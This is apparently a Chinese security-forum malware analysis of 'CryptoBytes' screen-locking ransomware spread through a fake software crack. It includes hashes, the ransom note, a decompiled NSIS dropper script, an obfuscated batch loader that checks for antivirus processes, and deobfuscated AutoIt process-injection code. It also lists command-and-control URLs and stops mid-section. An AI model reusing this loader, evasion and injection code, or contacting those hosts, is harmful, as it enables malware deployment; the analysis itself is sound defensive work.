【独家破解】揭秘境外黑客组织的20美元锁机病毒:深度逆向分析+破解攻略!
本帖最后由 Solarsec 于 2024-9-3 15:42 编辑# **1.背景**
## **1.1 客户被锁机及盗号情况**
在2024年8月17日,某客户联系上我们,称其重要的电脑系统被勒索加密,询问详情得知,该客户于24年8月16日下午从外网上下载了一个文件,该文件为其行业的一个专业工具的破解器(如下图的“arch1508_1324.7z”),解压运行之后电脑CPU开始飙升,磁盘读写拉满,短短半分钟内开始弹出勒索信息,
客户意识到情况不对之后,当即拔掉电源断开网线,但是再次重新进入系统也无法进入,通过PE进入系统之后,发现了勒索信txt文件,文件内容为“ Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked ”,该勒索信声称其为 CryptoBytes的黑客组织,需要通过telegram联系他们获取解密密钥。
由于客户的系统已无法正常进入,因此我们将恶意文件提取出来,在我们的模拟环境中运行,下图即为运行之后的勒索信息和加密后的屏幕界面。
最终在我们的协助下,我们成功帮助客户恢复了系统,同时对恶意文件的逆向分析发现了该恶意文件不仅仅是加密系统的行为,还有其他恶意行为,我们也都为客户一一排查清理了相关的病毒后门,本文便是对该恶意文件的详细文件,以及其释放的加密器的破解方案。
## **1.2 和锁机黑客的对话沟通**
通过黑客留下的勒索信,关注了Telegram的频道@yes_u_are_hacked,可以看到该频道最早于2023年9月5日创建,并且频道内还留下了中、英、阿三语的勒索信息,以及大量受害者的求助留言,频道作者声称收费20美金帮助解锁被加密的电脑系统,以100美金出售该勒索软件源码。
频道中也留下提示,需要解锁联系 @Flainn1的telegram用户,在客户与该黑客的沟通谈判中还闹出了个乌龙,因为频道中有大量俄语内容,客户便以为是大毛黑客,结果是二毛……
可以看到该作者勒索20美金以USDT支付才会给解锁。既然客户寻找到了我们的帮助,那么这赎金是万万不能支付的,接下来我们将详细的分析该恶意文件的行为以及其加密器定的破解方法,无需缴纳一分钱赎金,解锁被加密的系统,赎金?给你付个🥚!
# **2.恶意文件基础信息**
## **2.1 病毒基本信息**
文件名: AppFile.exe
编译器:
大小: 755603531(720.60 MiB)
操作系统: Windows(2000)
架构: I386
模式: 32 位
类型: GUI
字节序: LE
MD5: 490f6e8fb98238758571d6aea92ccea4
SHA1: fb24934f5ce41901e8d138046d33f6af2d0bd2cc
SHA256: 280c852ae170716d0f6f3da8532b77b7d88f5abab084e630b0d94c4ed47e0198
文件名: DocumentsKKFCAAKFBA.exe
编译器:
大小: 285184(278.50 KiB)
操作系统: Windows(2000)
架构: I386
模式: 32 位
类型: GUI
字节序: LE
MD5:9cf14b0c62311b27ace3c25c21a722ff
SHA1:4037b8cee08d09db0fce2d485ca3a83ca3f4871a
SHA256: 6419a4d08ba5c07e14c2d75b14ea8da5f2f340d4747e498fe515685c48542b33
文件名: lc.exe
编译器:
大小: 184832(180.50 KiB)
操作系统: Windows(2000)
架构: I386
模式: 32 位
类型: GUI
字节序: LE
MD5:7924c0f21738fab05f61102c0caf3da2
SHA1:09e6fd5797381eeb9ec60d5214f2932154636247
SHA256:9b29f5a1f0b6c270c90b343f4c6d0e0843201d687068dc5273cbf5074083609f
## **2.2 勒索信**
> Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked
# **3.加密后文件分析**
## **3.1威胁分析**
| **病毒家族** | CryptoBytes (乌克兰) |
| ----------------------------- | ------------------------------------------------------------ |
| **首次出现时间/捕获分析时间** | 2023-09-05/2024-08-16 |
| **威胁类型** | 勒索软件,锁机病毒 |
| **加密文件扩展名** | 无 |
| **勒索信文件名** | info-0v92.txt |
| **有无免费解密器?** | 无 |
| **联系邮箱** | info-0v92.txt |
| **检测名称** | Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)),Cylance(Unsafe),DeepInstinct(MALICIOUS),Emsisoft(Gen:Variant.Tedy.512515 (B)),ESET-NOD32(A Variant Of MSIL/Filecoder.LU),GData(Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt),K7GW(Trojan ( 0052f4e41 )) |
| **感染症状** | 无法进入系统并且会将系统内部的信息进行回传、磁盘将会被锁、所有正常文件都会被修改为隐藏模式。 |
| **感染方式** | 受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接 |
| **受灾影响** | 系统主题被锁,如果不支付赎金就只能通过重装系统进行恢复 |
# **4.逆向分析**
## **4.1加密器逆向分析**
### **AppFile.exe(恶意模块下载器)**
**保护分析:**
发现是一个NSIS的安装器
**入口分析:**
通过DIE查看可以知道,该程序是一个NSIS的安装包,可以提取出安装脚本。
安装器脚本:
该脚本可以看出,就是在做文件的释放与调用CMD来执行cmd "/k move Laboratories Laboratories.cmd & Laboratories.cmd & exit";"open cmd"命令,可以看得出,主要是对Laboratories这个文件进行了一个复制并且执行的操作。
```
; NSIS script (UTF-8) NSIS-Park-1 Unicode
; Install
Unicode true
SetCompressor zlib
; --------------------
; HEADER SIZE: 26016
; START HEADER SIZE: 300
; MAX STRING LENGTH: 8196
; STRING CHARS: 2199
OutFile .exe
!include WinMessages.nsh
SilentInstall silent
; --------------------
; LANG TABLES: 1
; LANG STRINGS: 40
Name Name
BrandingText "Nullsoft Install System (Unicode) v2.46.5-Unicode"
; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System (Unicode) v2.46.5-Unicode"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 Name
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_10 1033 "Create folder: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_19 1033 "ExecShell: "
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_23 1033 "Installer corrupted: invalid opcode"
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_36 1033 "Unregistering: "
LangString LSTR_37 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_38 1033 "Registering: "
LangString LSTR_39 1033 Custom
InstType $(LSTR_39) ;Custom
; wininit = $WINDIR\wininit.ini
; --------------------
; SECTIONS: 1
; COMMANDS: 169
Section ; Section_0
; AddSize 3151
Push r
Pop $2
IfErrors label_5 label_5
Return
Quit
label_5:
SetShellVarContext all
IfFileExists C:\Mi$2c\*.* label_165
ClearErrors
IfErrors label_10 label_10
CopyFiles /FILESONLY EditingAdjacent DllUnregisterServer
label_10:
SetOutPath $TEMP
ReadEnvStr $6 RelyFrontier
GetFullPathName $8 RnRatedPowellRows
File Basename
ReadEnvStr $R7 NotifyBibliographic
Nop
File Laboratories
DeleteRegValue SHCTX "" AccomplishParadise
IfErrors label_22 label_22
MessageBox MB_OK BaselineIndiansToilet
MessageBox MB_OK|MB_ICONQUESTION BowlUsedAccentContribute
SetRegView 64
label_22:
File Adidas
IfErrors label_27 label_27
CopyFiles /FILESONLY ThingsWindow DllRegisterServer
Return
CopyFiles /FILESONLY AcceptEmerald DllUnregisterServer
label_27:
IfRebootFlag label_30 label_30
Exch
CopyFiles /FILESONLY PittsburghIts DllRegisterServer
label_30:
File Values
IfFileExists AmongstGayMuzeToxic label_33 label_33
MessageBox MB_OKCANCEL PagesHopefullyDemonstratedPragueTreatmentsVentures
label_33:
Nop
File Warming
Nop
DeleteRegValue SHCTX "" NanoSh
File Pale
ClearErrors
IfErrors label_41 label_41
CopyFiles /FILESONLY NeedleWaves DllUnregisterServer
label_41:
File Might
IfErrors label_46 label_46
CopyFiles /FILESONLY MaiRule DllRegisterServer
CreateDirectory ShemaleArrange
Abort PokemonClaire
label_46:
GetCurrentAddress $R6 ; StrCpy $R6 47
File Ted
ClearErrors
GetCurrentAddress $7 ; StrCpy $7 50
File Alien
ClearErrors
IfFileExists ZeroVehiclesLibraryRacksJet label_55 label_55
Sleep 8031
CopyFiles /FILESONLY BarTelevision DllRegisterServer
label_55:
File Newsletters
Push "Challenging "
GetTempFileName $6 WyUsbFinances
File Thereby
IfAbort label_63 label_63
Sleep 7536
Exch
Quit
label_63:
ClearErrors
File Writer
GetErrorLevel $9
GetCurrentAddress $R5 ; StrCpy $R5 67
File Clothing
GetFullPathName $R6 LizProperBen
GetErrorLevel $R5
File Buildings
ClearErrors
GetCurrentAddress $7 ; StrCpy $7 73
File Nos
IfErrors label_78 label_78
MessageBox MB_ABORTRETRYIGNORE ConditionsFrontHeraldJuneShop
CreateDirectory LatviaCaroline
Exch
label_78:
IfAbort label_82 label_82
SetOutPath CapabilitySudan
CopyFiles /FILESONLY SalariesCoalition DllUnregisterServer
Sleep 7131
label_82:
File Boy
GetFullPathName $9 SubsidiariesOpponent
Push 81631803
File Slim
Pop $R9
ClearErrors
File Affect
Goto label_93
DeleteRegKey 0x33F NeedleExotic VolvoGrocery
CopyFiles /FILESONLY McdonaldConsists DllUnregisterServer
CopyFiles /FILESONLY ConsultExamined DllUnregisterServer
label_93:
IntOp $R8 $8 >> 249
File Trim
GetFullPathName $R5 ForumsExpansionTheseTemporarilyWhileAspects
DeleteRegValue SHCTX "" QuotedReference
File Listen
IfAbort label_100 label_100
SetOutPath ProceedingsSome
label_100:
Push "Spell Preliminary Dash Towards "
File Nascar
IfRebootFlag label_105 label_105
Exch
CopyFiles /FILESONLY WebmastersMarie DllUnregisterServer
label_105:
GetErrorLevel $R9
File Impressive
GetErrorLevel $7
IfAbort label_112 label_112
Exch
CreateDirectory FantasticRenew
DeleteRegKey 0x454 PermalinkBeats ThumbzillaHolocaust
label_112:
File Highlighted
SetErrors
IfFileExists PikeWendy label_118 label_118
CreateDirectory TeachesSwift
Exch
Sleep 617
label_118:
File Spoken
GetTempFileName $9 PersonalEditedReprints
Nop
File Centered
GetTempFileName $R9 GradesUtc
IfFileExists WellnessKoreanBetter label_127 label_127
SetRegView 32
CopyFiles /FILESONLY SharkTrigger DllRegisterServer
SetOutPath AppsMuseum
label_127:
File Prostores
ReadEnvStr $8 EarningsHole
DeleteRegValue SHCTX "" ReadyCg
File Monte
GetFullPathName $R5 ArtisticRegular
GetTempFileName $7 KongTraining
File Southeast
IntOp $R8 212 - 910
GetTempFileName $R8 GigLuxuryGradeStaying
File Layer
Nop
ClearErrors
File Field
GetFullPathName $8 PoolsInstantlyCharitable
IfRebootFlag label_143 label_143
Quit
label_143:
File Commons
IfFileExists StupidArgumentsSuitesEmirates label_147 label_147
Quit
SetRegView 64
label_147:
Goto label_151
Abort EffectivenessImpressive
ReadINIStr $_195948525_ "" "" ""
Quit
label_151:
File Ez
IfRebootFlag label_156 label_156
MessageBox MB_OK|MB_RIGHT EngagementLensCabinLitigation
ReadINIStr $_195948525_ "" "" ""
Quit
label_156:
Push .
Pop $3
SetShellVarContext current
Push e
Pop $4
ClearErrors
Pop $7
ExecShell open cmd "/k mov$4 Laboratories Laboratories$3cmd & Laboratories$3cmd & exit" ; "open cmd"
Push 10773218
label_165:
DeleteRegValue SHCTX "" TreatingHomeland
Sleep 7098
GetCurrentAddress $R6 ; StrCpy $R6 168
SectionEnd
; --------------------
; UNREFERENCED STRINGS:
/*
1 ProgramFilesDir
17 "C:\Program Files"
34 $PROGRAMFILES
37 CommonFilesDir
52 "$PROGRAMFILES\Common Files"
68 $COMMONFILES
204 MattersMain
438 LegitimateEminem
816 TireApproaches
831 ChequeJapan
958 BlastAssured
1091 WorkstationAdobe
1108 MysimonMetallic
1317 MediterraneanIso
1645 UvAtlas
*/
```
分析Laboratories文件(内容过多,只截取部分):
```
Set Prescription=/
pNUhObserve Nvidia Teens Ages Described Joining Synopsis
DbwxGames Staffing Lol Weblogs Cook Colon Microwave Transition Earning
IjlNine Corruption Illness Events
rXSpas Crisis Carried
xDRetreat
rqUdConducted Cope Maximize
Set Readings=J
swkOCf
JuSwift Events
tqSpecializing Tickets Sales
UBFFExamination Affairs Doctrine
jNGage Bryant Videos Sensitivity
ahhfOriented Specializing Concept Private
kdTzVaried Providing United Several Hugo Organizing
LuqThousand Furnished Indoor Useful Tim Cards Corpus
nHPresidential Mattress Thomson Roland Hart
Set Madonna=
XiSuPioneer Community Charlie Fridge Fred
BufIIntimate Regulations Residents Voyeur Benefits Bridal Mix
qcqxPick Crops Advancement Dot False Assignment Lunch Annie Died
gLZRPolished Bloom Handed Greetings Taiwan Cleanup Enquiries Planet Saskatchewan
KRDBooth Ascii Pdas Segment Der Property Cents Scientists Displayed
jiJlJean Democrat Boss Dodge Operating Cr Tool
GAForm Me Debut Saying Orlando Da Warning
Set Background=G
GWMiTerminals Specs Obligation Chronicles Regular Jail Billing Timer
jFUrls Republicans Consolidated Annually Allen Economy
sECCircle Across Coal Officials Associated
SdzuExtends Axis Hair Interactions Romantic Distinction Dist Paxil
BwIwVernon Ta Neural
Set Pakistan=V
lsabMiniature Struck
ebD Humanitarian Buildings Holding Byte Palmer Miniature Linear Delhi
XGCalculators Filename Cents Elsewhere Bound Weak Dg Portfolio Carries
FZVelvet Essential Continued Hat Darwin Navigator Jail
PjVSoccer Define Alone Buf Ww Quizzes Display Pure Heating
PcTsunami Beastality Continues Developed Benchmark Blake
Set Lenders=y
JhdStd Flip Chances Fax Existence Brand Defining Greece
MkCeramic Occur Fingering Dude Enforcement Oracle
OSfDont Foam Queensland Capture Grip
cCOCinema Surfaces Tower Michel Bang Absolutely Prix Compatible
HaPrev Va Js Citizens Changes Boxing Athletic Reseller Mailto
CRTZWheel Squirt Trip Super Compact Indie
ZMvLOperators Shipment Negotiations
Set Postal=A
fIPediatric Dear Exhibition Entrance Keeps Agent Diverse
drBike Griffin Race Fetish Democratic Sake Clocks
WXMHuge Technologies Ignored Usgs Uruguay Energy Template
EdRdNissan Metallic Printing Horror Kernel Shaved
zwuBenjamin Diary Imagine
ZNLQLearners Testament Hobby Arc Bars Explaining Syria Identifies Ghz
ODRecreation Pantyhose Creation Jacksonville
biFormer Guitars Resort
Set Correct=R
SqKQAgo Heat Bm Pushed Cases Partnerships
oWZTube Floyd Pilot Produces Liver Sequences Phys Lifetime Pharmaceutical
IFKenya Places
kHqvEar Composed Mambo Widescreen Ou Ts Baseball
NgksJ Gui Marketing Chelsea
rsCir Entry
QXkShadows Bulgaria Logic Training Medication
HoRaces Textile
EJUqDk Romance Adrian Dns
rnBehalf Led Burner Tape College Class Podcasts Properties Nr
Set Al=i
fOtRHighways Ibm Downloaded
NmEnterprises Tunes Mask
llApprox Arizona Voted Invision Scotia
gXCCms Weighted
hjuPremier Completing Analyst Syndication Painted
NdSuites
jGmHard Lies Museum Propose Filme
fdIowa Tattoo Aspect Advantage Schedules Speaking Worship Association Sensitive
Set Arthritis=t
oHStrategies Conservation Catering Ruth
LKWPoints Mining Centuries Poster Manually Scan Comparable
TtcCattle Reproduction Manchester Combine Synthesis Liechtenstein Indicators
ZnjCollection Steven Change Clock Lil Perfect Deals Risks
sskJLinux Adjusted Suspected
irPermalink Push Incorrect
FOlGale Religion Continental
Set Expressed=n
JHqCultural Stud Parking Shore Sie Harrison Exists Keep
ZvJExtended Clause Pensions List Carry Proper Ministries Transport
wADETextiles Hong
RzSkCreations Municipal Stan Threats Angela Driven Bra Correction Content
JSToWorkshop Medicaid Ultra Increasing Voices Fiscal
ujkhAtom Ronald Clone Asia
Set Spain=s
XrJPig Ee Shipment
RJUDistrict Received Shows Shot Douglas Inclusive Header
DxNon Plates Roommates Static Apply
wNSIrish Couples
ddhCharles Prairie
vaAqDetermined Virgin Thereby Nuts Holdings Growth Somewhere
FrDImproved Ribbon Ct Seven Tulsa Anna Loving Seller Lifestyle
mXDictionaries Brazilian
```
发现存在大量的混淆,这里去掉以后,可以看到一个完整的脚本,可以发现,该脚本开头主要实现设置rwUvTfWQtZfcV9tBZFV环境变量的值为Quotations.pif,其次就是实现对释放文件的拼接,将其拼接为rwUvTfWQtZfcV9tBZFV 和resJUby两个文件
| 文件名 | 作用 |
| ------------------- | ------------------ |
| rwUvTfWQtZfcV9tBZFV | AutoIt脚本执行程序 |
| resJUby | AutoIt脚本 |
还有对系统进程的检测,目的是为了判断系统中是否存在杀软等保护软件,主要通过判断是否存在如下进程:
> wrsa.exe opssvc.exe avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe
如果进程中存在wrsa.exe opssvc.exe则ping 127.0.0.1这个地址185次,相当于是延迟程序执行一段时间
如果进程中存在avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe就是会设置环境rwUvTfWQtZfcV9tBZFV变量的值为AutoIt3.exe和esJUby变量值为.a3x。
最后就是执行拼接的文件start /I rwUvTfWQtZfcV9tBZFV resJUby,相当于是执行Autoit脚本。
```
Set rwUvTfWQtZfcV9tBZFV=Quotations.pif
Set esJUby=
tasklist | findstr /I "wrsa.exe opssvc.exe" & if not errorlevel 1 ping -n 185 127.0.0.1
Set /a Mc=736775
tasklist | findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" & if not errorlevel 1 Set rwUvTfWQtZfcV9tBZFV=AutoIt3.exe & Set esJUby=.a3x
cmd /c md Mc
findstr /V "sqpaxilclaimsml" Alien > Mc\rwUvTfWQtZfcV9tBZFV
copy /b Mc\rwUvTfWQtZfcV9tBZFV + Ez Mc\rwUvTfWQtZfcV9tBZFV
cd Mc
cmd /c copy /b ..\Writer + ..\Newsletters + ..\Slim + ..\Listen + ..\Impressive + ..\Centered + ..\Nos + ..\Adidas + ..\Trim + ..\Affect + ..\Basename + ..\Highlighted + ..\Prostores + ..\Ted + ..\Thereby + ..\Values + ..\Spoken + ..\Might + ..\Southeast + ..\Field + ..\Pale + ..\Clothing + ..\Boy + ..\Layer + ..\Buildings + ..\Monte + ..\Commons + ..\Warming + ..\Nascar resJUby
start /I rwUvTfWQtZfcV9tBZFV resJUby
choice /d y /t 5
```
这里将AutoIt脚本文件中的脚本提取出来后,发现存在大量的混淆(因为代码太长,这里只展示部分代码):
```
Func COMMITSOMALIA($hrsinvestigationtheir, $compensationdesktoptrademarkphpbb = "", $verizonactressresistant = "", $proteinsidesbodiesfrancisco = 0x0)
While 0x2ef
$cabintestimonypanama = 0x811b
Switch $cabintestimonypanama
Case 0x811a
Chr(0xe5b)
PixelGetColor(REFUSEPARA("74d92d73d80d74d71d82d76d93d80d85d71d87d76d89d80d86d75d71d79d76d72d75d76d89d71", 0x7 + 0x0), REFUSEPARA("74d92d73d80d74d71d82d76d93d80d85d71d87d76d89d80d86d75d71d79d76d72d75d76d89d71", 0x7 + 0x0))
Floor(0x76)
MemGetStats()
$cabintestimonypanama = $cabintestimonypanama + 0x384ee / 0x384ee
Case 0x811b
Local $framingremedyadoptionspelling = DllStructCreate(REFUSEPARA("105d128d123d108d98", 0x9 + 0xfffffffe) & Call(REFUSEPARA("72d111d116d103d120d127d82d107d116", 0x9 + 0xfffffffd), $hrsinvestigationtheir) & REFUSEPARA("102", 0xf + 0xfffffffa))
ExitLoop
Case 0x811c
Cos(0x1d79)
Floor(0x24d)
Ceiling(0x2348)
PixelGetColor(REFUSEPARA("87d100d117d106d104d119d104d103d46d80d103d46", 0x5 + 0xfffffffe), REFUSEPARA("87d100d117d106d104d119d104d103d46d80d103d46", 0x5 + 0xfffffffe))
ProgressOff()
ObjGet(REFUSEPARA("76d103d116d116d123d63d82d99d123d111d103d112d118d63", 0x2 + 0x0))
$cabintestimonypanama = $cabintestimonypanama + 0xf2a4d / 0xf2a4d
EndSwitch
WEnd
While 0x14d
$xboxvt = 0x6d93
Switch $xboxvt
Case 0x6d92
IsDeclared(REFUSEPARA("67d66d83d84d33d33d33d33d66d84d84d86d78d70d69d33d33d33d33", 0x1 + 0x0))
IsDeclared(REFUSEPARA("77d74d80d79d84d34d67d66d83d79d34d73d70d77d70d79d66d34", 0x1 + 0x0))
PixelGetColor(REFUSEPARA("86d87d85d72d81d74d87d75d72d81d64d70d68d86d68d64", 0x3 + 0x0), REFUSEPARA("86d87d85d72d81d74d87d75d72d81d64d70d68d86d68d64", 0x3 + 0x0))
Cos(0x157f)
MemGetStats()
Ceiling(0x17ef)
$xboxvt = $xboxvt + 0x89c9f / 0x89c9f
Case 0x6d93
DllStructSetData($framingremedyadoptionspelling, 0x1, $hrsinvestigationtheir)
ExitLoop
Case 0x6d94
PixelGetColor(REFUSEPARA("69d103d110d103d100d116d99d118d107d113d112d34d71d122d101d110d119d117d107d120d103d110d123d34d86d113d113d34d90d110d34", 0x2 + 0x0), REFUSEPARA("69d103d110d103d100d116d99d118d107d113d112d34d71d122d101d110d119d117d107d120d103d110d123d34d86d113d113d34d90d110d34", 0x2 + 0x0))
Log(0x17c8)
DirGetSize(REFUSEPARA("82d123d108d103d104d50d83d114d122d104d117d118d104d111d111d104d117d50d81d108d102d100d117d100d106d120d100d50", 0x4 + 0xffffffff))
IsDeclared(REFUSEPARA("103d104d120d103d110d103d115d38d122d120d123d107d38d120d107d119d123d107d121d122d121d38", 0x6 + 0x0))
Floor(0x1d9)
ObjGet(REFUSEPARA("73d85d83d83d85d84d89d39", 0x9 + 0xfffffffd))
PixelGetColor(REFUSEPARA("104d122d120d121d116d114d120d52d111d116d122d119d115d102d113d110d120d121d52d120d104d109d116d113d102d119d52", 0x7 + 0xfffffffe), REFUSEPARA("104d122d120d121d116d114d120d52d111d116d122d119d115d102d113d110d120d121d52d120d104d109d116d113d102d119d52", 0x7 + 0xfffffffe))
Log(0x1d37)
$xboxvt = $xboxvt + 0x3e09e / 0x3e09e
EndSwitch
WEnd
While 0xf
$toldaustraliaamplifierbetween = 0x12f70
Switch $toldaustraliaamplifierbetween
Case 0x12f6f
Chr(0x5b9)
ProgressOff()
MemGetStats()
DirGetSize(REFUSEPARA("89d106d108d73d91d110d111d120d123d118d124d73", 0x9 + 0x0))
ObjGet(REFUSEPARA("68d71d91d81d80d70d49d82d71d67d84d78d49d69d75d81d49d85d69d81d86d78d67d80d70d49", 0x2 + 0x0))
DirGetSize(REFUSEPARA("112d117d123d108d117d107d108d107d39d39d39d39d121d118d124d123d112d117d108d122d39d39d39d39d112d117d123d108d121d112d116d39d39d39d39", 0xa + 0xfffffffd))
IsDeclared(REFUSEPARA("107d126d118d114d117d121d111d117d116d41", 0x7 + 0xffffffff))
Chr(0x18b5)
$toldaustraliaamplifierbetween = $toldaustraliaamplifierbetween + 0xd5b2e / 0xd5b2e
Case 0x12f70
Local $tbperformance = DllStructGetPtr($framingremedyadoptionspelling)
ExitLoop
Case 0x12f71
MemGetStats()
Log(0x940)
Chr(0xb3)
IsDeclared(REFUSEPARA("86d113d121d112d66", 0x3 + 0xffffffff))
Floor(0x23d)
Log(0x2044)
$toldaustraliaamplifierbetween = $toldaustraliaamplifierbetween + 0x2857e / 0x2857e
EndSwitch
WEnd
$craftstrademarksthanksgiving =
```
通过对其进行反混淆以后,可以恢复出该脚本的原始代码(篇幅过长,只展示部分):
发现该脚本主要对携带的二进制数据做了解密,然后进程注入的操作,直接提取样本即可。
```
Func COMMITSOMALIA($hrsinvestigationtheir, $compensationdesktoptrademarkphpbb = "", $verizonactressresistant = "", $proteinsidesbodiesfrancisco = 0x0)
Local $framingremedyadoptionspelling = DllStructCreate("byte[" & Call("BinaryLen", $hrsinvestigationtheir) & "]")
DllStructSetData($framingremedyadoptionspelling, 0x1, $hrsinvestigationtheir)
Local $tbperformance = DllStructGetPtr($framingremedyadoptionspelling)
$craftstrademarksthanksgiving = "dwordcbSize; ptr Reserved; ptr Desktop; ptr Title; dword X; dword Y; dword XSize; dword YSize; dword XCountChars; dword YCountChars; "
$borderserverlargesusan = "dword FillAttribute; dword Flags; word ShowWindow; word Reserved2; ptr Reserved2; ptr hStdInput; ptr hStdOutput; ptr hStdError"
Local $defensiveblinkcommissiondraws = DllStructCreate("STRUCT; " & $craftstrademarksthanksgiving & $borderserverlargesusan & "; ENDSTRUCT; ptr AttributeList")
Local $likelihoodattendedball = DllStructCreate("ptr Process; ptr Thread; dword ProcessId; dword ThreadId")
Local $housingwaitbowl = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", 0x2000000, "bool", False, "dword", ProcessExists("explorer.exe"))
$strikestopic = DllStructCreate("handle ExplorerHandle;")
DllStructSetData($strikestopic, "ExplorerHandle", $housingwaitbowl)
$gradeshenablingprobe = DllCall("kernel32.dll", "bool", "InitializeProcThreadAttributeList", "ptr", NULL, "dword", 0x1, "dword", 0x0, "dword*", 0x0)
$ensuressomewhatware = DllCall("kernel32.dll", "ptr", "HeapAlloc", "hWnd", DllCall("Kernel32.dll", "hWnd", "GetProcessHeap"), "dword", 0x0, "dword", $gradeshenablingprobe)
DllStructSetData($defensiveblinkcommissiondraws, "AttributeList", $ensuressomewhatware)
DllStructSetData($defensiveblinkcommissiondraws, "cbSize", DllStructGetSize($defensiveblinkcommissiondraws))
$partnershipspecialized = 0x8080004
If ProcessExists("avp.exe") Then $partnershipspecialized = 0x8000004
$housingwaitbowl = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", NULL, "wstr", $verizonactressresistant & " " & $compensationdesktoptrademarkphpbb, "ptr", 0x0, "ptr", 0x0, "int", 0x0, "dword", $partnershipspecialized, "ptr", 0x0, "ptr", 0x0, "ptr", DllStructGetPtr($defensiveblinkcommissiondraws), "ptr", DllStructGetPtr($likelihoodattendedball))
Local $doctorprintingseason = JACOBCAMEDECEMBERDESCRIPTION($likelihoodattendedball, "Process")
Local $stampfreedomnam = JACOBCAMEDECEMBERDESCRIPTION($likelihoodattendedball, "Thread")
Local $hzassetwired = JACOBCAMEDECEMBERDESCRIPTION($likelihoodattendedball, "ProcessId")
Local $headlinesflag, $countusernamepackedparticipants, $troutperfumethrowscircle
$troutperfumethrowscircle = Execute("@AutoItX64")
If $troutperfumethrowscircle Then
$headlinesflag = 0x2
$countusernamepackedparticipantspart1 = "align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home; dword ContextFlags; dword MxCsr; word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags; uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7; uint64 Rax; uint64 Rcx; uint64 Rdx; "
$countusernamepackedparticipantspart2 = "uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15; uint64 Rip; uint64 Header; uint64 Legacy; uint64 Xmm0; uint64 Xmm1; uint64 Xmm2; uint64 Xmm3; uint64 Xmm4; uint64 Xmm5; uint64 Xmm6; uint64 Xmm7; "
$countusernamepackedparticipantspart3 = "uint64 Xmm8; uint64 Xmm9; uint64 Xmm10; uint64 Xmm11; uint64 Xmm12; uint64 Xmm13; uint64 Xmm14; uint64 Xmm15; uint64 VectorRegister; uint64 VectorControl; uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip"
$countusernamepackedparticipants = DllStructCreate($countusernamepackedparticipantspart1 & $countusernamepackedparticipantspart2 & $countusernamepackedparticipantspart3)
Else
$headlinesflag = 0x1
$countusernamepackedparticipantspart4 = "dword ContextFlags; dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7; dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; "
$countusernamepackedparticipantspart5 = "byte RegisterArea; dword Cr0NpxState; dword SegGs; dword SegFs; dword SegEs; dword SegDs; dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax; dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs; byte ExtendedRegisters"
$countusernamepackedparticipants = DllStructCreate($countusernamepackedparticipantspart4 & $countusernamepackedparticipantspart5)
EndIf
```
下载器本体:
sub_7FF7DDCF50A0函数可以看到具体的请求内容:
请求的地址为:
http://193.233.232.86/api/crazyfish.php
http://147.45.47.57/api/crazyfish.php
可以发现,若是请求为200,且内容为fish15则继续
因为这里发现该IP被关了,这里可以参考一下沙箱的内容,继续分析。
这里可以看到后续会加载很多的恶意攻击模块
几乎所有的攻击模块都是.Net写的,加载方式几乎都是如下这种内存Payload注入的加载方式,其中里面的Payload都是加密的,可以看到程序内部的Payload会先经过ReadComponentType函数进行解密,之后调用了VirtualProtect修改了内存的权限,然后继续解密,加载Payload。
### **DocumentsKKFCAAKFBA.exe(后门程序)**
**保护分析:**
发现加了Reactor的壳,这里直接脱掉分析。
**入口分析:**
整体来看该程序就是一个典型的后门程序
1.开始用RC4算法解密了两段程序,第一个是PE的shellcode加载器,第二段是shellcode,这里因为内部的密文比较大,所以直接手动解密一下两个密文的部分数据看一下:
第一段:
第二段:
可以看出,第二段是一个很典型的Shellcode
2.之后就是调用VirtualProtectEx修改权限,然后调用CallWindowProcA函数实现启动第一段的PE程序,并且将执行Shellcode送入第一段的程序中执行。
### **锁机程序(lc.exe)**
**保护分析:**
**功能分析:**
**勒索信写入:**
1 向C:\Users<用户名>\desktop桌面文件夹中写入勒索信,并且将当前目录及其子目录的所有文件和文件夹属性设置为隐藏和只读,最后将勒索信info-0v92.txt这个文件的隐藏属性去掉。
```
